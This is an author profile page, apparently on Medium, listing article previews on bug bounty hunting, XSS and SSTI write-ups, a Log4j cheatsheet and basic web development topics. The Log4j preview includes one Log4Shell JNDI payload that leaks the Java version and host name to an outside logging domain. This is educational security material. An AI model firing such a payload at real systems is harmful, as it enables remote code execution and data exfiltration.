Anton (therceman)

1.6K Followers

Published in

InfoSec Write-ups

·Pinned

Bug Bounty Writeup: $2500 Reward for Session Hijack via Chained Attack

A detailed Bug Bounty Writeup explaining a session hijack vulnerability that was exploited using Cross-Site Scripting (XSS), coupled with a Web Application Firewall (WAF) bypass and Server-Side Template Injection (SSTI). This in-depth analysis explores how these chained vulnerabilities were discovered, earning a $2500 reward. Hello 👋 First of all, I’d…

Cybersecurity

6 min read

Published in

InfoSec Write-ups

·Pinned

How to Find Your First Bug: Motivation and Tips for Bug Bounty Hunting

Have you recently entered the world of bug bounty hunting and are having trouble locating your first bug? Don’t worry, you’re not alone. It’s a common challenge that requires persistence and dedication. In this article, I have prepared some helpful tips to guide you on your bug bounty journey. First…

Cybersecurity

3 min read

Published in

InfoSec Write-ups

·Pinned

$350 XSS in 15 minutes

Bug Bounty Writeup about DOM XSS via JSONP + Parameter pollution — Hello 👋 This is my first and last Bug Bounty Writeup this year. 😀 I am sharing with you my latest XSS finding, which I found 2 weeks ago. This was the fastest and a bit unusual flow that I normally do when I search for XSS. So let’s dive…

Cybersecurity

3 min read

Published in

InfoSec Write-ups

·Pinned

How To Start Bug Bounty Hunting

Short & Basic Intro to Bug Bounty World — I recommend registering on the following crowdsourced cybersecurity platforms (bug bounty platforms): https://www.bugcrowd.com https://www.hackerone.com https://www.intigriti.com Searching for bugs in the wild (not on a bug bounty platform) can be great, but it may not be the best place to start as there is no guarantee that the company will respond…

Cybersecurity

3 min read

Published in

InfoSec Write-ups

·Dec 14, 2021

Log4j Vulnerability Cheatsheet

How it works, where to practice, and how to identify Description Java logging library, log4j, has an unauthenticated RCE vulnerability if a user-controlled string is logged. CVE-2021-44228 (Log4Shell) Affected versions — Apache log4j 2.0-beta9 ≤ 2.14.1 How It Works Specially crafted payload is injected into Headers, Input Fields, or Query/Body parameters https://target.com/?test=${jndi:ldap://jv-${sys:java.version}-hn-${hostName}.qwe3er.dnslog.cn/exp}

Log4j

3 min read

Published in

JavaScript in Plain English

·Aug 17, 2021

What is a Website URL?

Web Address Example Scheme and its Mandatory Components Explained — URL (Uniform Resource Locator) is the so-called address of the desired resource on the internet that consists of multiple components/parts. Let’s take a look at the following URL https://admin:pass@a.b.web.com:888/users/index.php?q=bob&role=2#info This URL consists of the following components: Scheme https:// Authority admin:pass@

Programming

3 min read

Published in

JavaScript in Plain English

·Aug 13, 2021

What is a JavaScript Recursive Function?

Advantages of recursion technology clarified — As website developers, we encounter recursive functions every day. This tutorial will explore the pattern of problems, which can be solved using recursion. Basic Concept function recurse() { // 2nd call to itself recurse(); } // 1st call recurse(); Each recursive function must have a base case (also called termination condition), where…

JavaScript

4 min read

Published in

JavaScript in Plain English

·Aug 11, 2021

WebP: The Image Format For Web Devs Who Care About Performance

WebP is an image compression technology that creates smaller file sizes without compromising on quality. It can reduce the file size by 20% to 80% (or even more) compared to JPEG, PNG, and GIF.

Web

2 min read

💰 Bug Bounty Hunter 💻 Software Developer 🌐 www.therceman.dev
